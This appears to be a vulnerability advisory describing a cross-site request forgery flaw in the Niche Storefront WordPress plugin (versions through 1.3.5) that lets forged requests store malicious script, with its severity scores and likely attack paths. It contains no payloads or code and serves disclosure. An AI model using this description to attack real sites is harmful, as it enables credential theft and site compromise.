The Clickbank WordPress Plugin (Niche Storefront) contains a Cross‑Site Request Forgery flaw that enables attackers to inject malicious script into the site’s stored data. When an authenticated user submits a crafted request, the plugin stores the payload, which is then executed for all visitors. This stored XSS can lead to credential theft, site defacement, and, in some cases, remote code execution. The vulnerability is classified as CWE‑352, indicating that improper validation of request context allows threat actors to forge legitimate requests. Based on the description, the attack vector requires a logged‐in user to perform the request, suggesting that the exploit is typically achieved through social engineering or a malicious link presented to an administrator.

Vendor dactum and its Clickbank WordPress Plugin (Niche Storefront). Versions from the earliest releases through 1.3.5 are affected. No specific minimum version is listed, therefore any installation of version 1.3.5 or earlier is considered vulnerable.

The CVSS score of 7.1 places this vulnerability in the medium‑high severity range, reflecting the potential for significant impact on site integrity and confidentiality. The EPSS score is under 1%, indicating that, as of the assessment date, exploitation is unlikely to be common. The vulnerability is not listed in the CISA KEV catalog, further suggesting it is not actively exploited in known campaigns. However, because the flaw leverages CSRF to store malicious XSS content, an attacker who successfully convinces an administrator to submit a crafted request can compromise all users of the site. The exploit requires the victim to be authenticated, so social‑engineering techniques or malicious links targeting administrators are the most probable attack paths.